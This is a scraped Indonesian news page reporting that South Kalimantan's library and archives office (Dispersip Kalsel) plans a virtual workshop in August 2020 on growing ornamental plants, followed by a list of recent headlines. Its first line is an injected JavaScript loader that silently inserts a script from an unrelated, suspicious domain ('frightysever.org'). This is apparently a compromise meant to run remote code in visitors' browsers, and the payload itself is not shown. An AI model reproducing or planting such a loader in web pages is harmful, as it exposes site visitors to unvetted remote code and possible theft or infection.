(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Dispersip Kalsel

Tren Tanaman Hias, Dispersip Kalsel akan Gelar Bimtek Virtual


KANALKALIMANTAN.COM, BANJARMASIN – Tren tanaman hias kembali mencuat di saat pandemi Covid-19. Ketika daya beli masyarakat menurun dan iklim perekonomi tidak stabil, tanaman hias justru laris manis di pasaran, khususnya di Kalimantan Selatan (Kalsel).

Trend mengoleksi tanaman hias ini disinyalir karena anjuran pemerintah untuk #dirumahsaja, cukup dipatuhi. Sehingga banyak masyarakat memilih tetap tinggal di rumah saja, dan mengurangi aktivitas di luar rumah. Untuk itu, sebagian masyarakat memilih kegiatan menanam tanaman hias. Maka, pasar tanaman hias pun laris-manis.

Kondisi tersebut, rupanya ditangkap pihak Dinas Perpustakaan dan Pengarsipan (Dispersip) Kalimantan Selatan sebagai peluang membuka sebuah kegiatan yang bermanfaat bagi masyarakat. Maka Dispersip Kalsel pun membuka program Bimbingan Teknis (Bimtek) terkait pembudidayaan tanaman hias ini.

Kepala Dispersip Kalsel Kalsel Dra Hj Nurliani Dardie mengatakan, kita lihat bersama bahwa kondisi saat ini masyarakat Kalsel baik perempuan maupun laki-laki sedang dilanda trend berkebun, khususnya tanaman hias.

“Karena itu, Dispersip Kalsel berinisiatif mengumpulkan para pencinta tanaman hias untuk bergabung secara virtual mengadakan Bimtek ini secara online,” kata Bunda Nunung, Kamis (6/8/2020).

Bunda Nunung menjelaskan, Bimtek online ini dilaksanakan pada tanggal 19 Agustus 2020 nanti, dengan mengangkat tema ‘Kelola Tanaman dengan Cinta untuk Kebahagiaan’.

Terkait kegiatan yang agak melenceng dari ‘dunia pustaka’ ini, Bunda Nunung mengatakan bahwa perpustakaan juga bisa berbasis inklusi sosial. “Dengan diadakannya bimtek online ini, semoga masyarakat yang terdampak perekonomiannya bisa mengeluti usaha alternatif, seperti budidaya tanaman hias,” katanya.

Pada bimtek ini, Dispersip Kalsel rencananya menghadirkan narasumber kompeten di bidangnya. Yakni Psikolog ternama di Kalimantan Selatan, Neka Erlyani SPsi MPsi. Psikolog sekaligus praktisi di bidang pertanian yang juga penelaah Difusi dan Alih Teknologi Pertanian, Nove Arisandi SP MP.

“Dari akun media social, kedua narasumber ini sering memperlihatkan aktivitasnya memelihara tanaman hias di saat pendemi dan new normal seperti saat ini,” ujarnya.

Untuk lancarnya bimtek ini, akan dihadirkan moderator handal untuk memandu jalannyanya acara, yaitu Dr Hilda Susanti SP MSi yang sekarang menjabat sebagai Ketua Umum Perhimpunan Hortikultura Indonesia Komda Kalimantan Selatan dan Koordinator Magister Agronomi Faperta Universitas Lambung Mangkurat (ULM) Banjarmasin. (Kanalkalimantan.com/fikri)

Reporter : Fikri
Editor : Cell


Desy Arfianty

Recent Posts

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

46 menit ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

12 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

14 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

14 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

14 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

16 jam ago

This website uses cookies.